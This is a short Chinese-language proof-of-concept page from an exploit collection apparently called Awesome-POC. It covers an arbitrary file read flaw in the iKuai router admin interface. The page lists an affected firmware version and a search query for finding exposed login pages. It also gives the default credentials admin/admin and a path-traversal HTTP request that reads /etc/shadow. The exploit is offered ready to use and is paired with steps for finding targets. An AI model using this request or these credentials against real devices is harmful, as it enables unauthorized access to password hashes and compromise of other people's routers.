Awesome-POC/网络设备漏洞/iKuai 后台任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

39 lines
472 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# iKuai 后台任意文件读取漏洞
## 漏洞描述
参考链接:
- https://forum.ywhack.com/thread-115307-1-8.html
## 漏洞影响
影响版本,不一定是绝对版本,也可能其它版本都存在:
```
3.2.8 x64 Build201910101758
```
## 网络测绘
```
title="登录爱快流控路由"
```
## 漏洞复现
默认用户名/密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```